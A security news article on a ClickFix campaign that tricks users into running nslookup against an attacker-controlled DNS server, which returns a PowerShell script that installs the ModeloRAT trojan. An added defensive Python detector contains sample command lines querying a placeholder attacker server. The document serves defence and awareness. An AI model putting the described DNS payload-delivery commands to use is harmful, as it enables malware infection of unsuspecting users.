New ClickFix Attack Uses nslookup to Steal Data via DNS

Summary
– Threat actors are now using DNS queries within ClickFix social engineering attacks to deliver malware, marking the first known use of DNS as a channel in these campaigns.
– In this new variant, victims are tricked into running a command that queries an attacker-controlled DNS server, which returns and executes a malicious PowerShell script.
– The attack ultimately deploys a remote access trojan called ModeloRAT, which allows attackers to remotely control compromised systems after establishing persistence.
– Using DNS for payload delivery allows attackers to modify scripts on the fly and blend malicious traffic with normal DNS queries for evasion.
– ClickFix attacks are rapidly evolving, with recent campaigns expanding beyond traditional malware to include techniques like account hijacking and browser-based JavaScript execution.

Cybersecurity researchers have uncovered a significant evolution in the notorious ClickFix social engineering campaigns, where attackers are now leveraging DNS queries to deliver malicious payloads. This marks the first documented instance of DNS being weaponized as a primary communication channel within these attacks, introducing a new layer of stealth and evasion. The technique involves tricking users into executing a seemingly benign command that secretly fetches and runs a harmful script from a rogue DNS server.
In this newly observed variant, the threat actors instruct their targets to run a specific nslookup command from the Windows Run dialog box. This command is configured to query a DNS server under the attacker’s control, rather than the system’s legitimate resolver. The response from this malicious server contains a hidden PowerShell script embedded within the DNS record’s “NAME:” field. Once the command is executed, this script is automatically parsed and run by the Windows command interpreter, initiating the infection chain.
Microsoft’s Threat Intelligence team detailed this method, noting that while the exact social engineering lure remains unclear, the attack manipulates users into believing they are fixing an error or enabling a feature. The command directs a lookup for a hostname like “example.com” to the attacker’s IP address, 84[.]21.189[.]20. Although this particular server is now offline, its response was designed to download additional malware from compromised infrastructure.
The second-stage PowerShell command retrieved a ZIP archive containing a Python runtime and malicious scripts. These tools perform reconnaissance on the infected device and its domain. To maintain access, the attack establishes persistence by creating a VBScript file in the user’s AppData folder and a shortcut in the Startup directory, ensuring the malware launches automatically with Windows. The ultimate payload deployed is ModeloRAT, a remote access trojan that grants attackers full remote control over the compromised system.
This approach represents a stark departure from traditional ClickFix attacks, which typically retrieve payloads over HTTP. By using DNS as a delivery channel, attackers can dynamically modify their scripts and blend malicious traffic with legitimate, everyday DNS queries, making detection significantly more challenging for security tools.
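The defensive counterpart to the technique described above is to watch process-creation telemetry for nslookup being pointed at a resolver the organisation does not operate, especially when launched through a command interpreter from the shell. The following is an added example written for this page, not code from the original article or from Microsoft; the approved resolver addresses, the sample events and the 203.0.113.5 server address are all constructed placeholders.

```python
import re

# Resolvers this (assumed) environment treats as legitimate. nslookup pointed
# at any other server is the core signal of the DNS-based ClickFix variant.
APPROVED_RESOLVERS = {"10.0.0.53", "10.0.1.53"}
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Constructed sample process-creation events (not real telemetry). 203.0.113.5
# is a documentation-range placeholder for an attacker-controlled server.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c nslookup example.com 203.0.113.5"},
    {"parent": "cmd.exe", "image": "nslookup.exe",
     "cmdline": "nslookup example.com 10.0.0.53"},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -c nslookup -type=txt example.com 203.0.113.5"},
    {"parent": "svchost.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\ops\\inventory.ps1"},
]

# Capture nslookup's arguments up to the next shell operator.
NSLOOKUP_RE = re.compile(r"\bnslookup(?:\.exe)?\b(?P<args>[^&|]*)", re.IGNORECASE)


def explicit_server(cmdline):
    """Return the server nslookup was told to query, or None if it relies on
    the system resolver. Non-interactively the first positional argument is
    the name to look up and the second, if present, is the server."""
    m = NSLOOKUP_RE.search(cmdline)
    if not m:
        return None
    positional = [t for t in m.group("args").split() if not t.startswith("-")]
    return positional[1].strip("'\"") if len(positional) > 1 else None


def triage(event):
    """Return the reasons an event is suspicious (empty list if none)."""
    reasons = []
    server = explicit_server(event["cmdline"])
    if server is not None and server not in APPROVED_RESOLVERS:
        reasons.append(f"nslookup directed at non-approved server {server}")
        # The article reports the command being run from the Run dialog, so an
        # interpreter spawned by explorer.exe strengthens the match.
        if (event["image"].lower() in INTERPRETERS
                and event["parent"].lower() == "explorer.exe"):
            reasons.append("interpreter launched from explorer.exe (Run dialog)")
    return reasons


def scan(events):
    """Return (index, reasons) for every event that triage flags."""
    return [(i, triage(e)) for i, e in enumerate(events) if triage(e)]
```

Running scan(SAMPLE_EVENTS) flags the two explorer-launched interpreters querying the placeholder server and leaves the lookup against an approved resolver alone.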
The ClickFix threat landscape is evolving at a rapid pace. Over the past year, attackers have continuously experimented with new delivery methods and payloads, targeting a broad range of operating systems. Earlier campaigns relied on convincing users to run PowerShell or shell commands directly. More recent iterations have expanded into novel territories.
For instance, a campaign dubbed “ConsentFix” abused the Azure CLI OAuth application to hijack Microsoft accounts, bypassing passwords and multi-factor authentication entirely. Threat actors have also capitalized on the popularity of AI tools, using shared pages for platforms like ChatGPT, Grok, and Claude Artifacts to promote fake technical guides that lead to ClickFix attacks.
In a separate development, researchers reported a ClickFix campaign promoted through comments on Pastebin. This attack targeted cryptocurrency users, tricking them into executing malicious JavaScript directly within their browser while visiting a cryptocurrency exchange. The script was designed to hijack transactions, representing one of the first ClickFix campaigns focused on manipulating web application functionality in real-time rather than deploying traditional malware onto a system. This shift highlights the attackers’ adaptability in exploiting different technologies and user behaviors to achieve their objectives.
(Source: Bleeping Computer)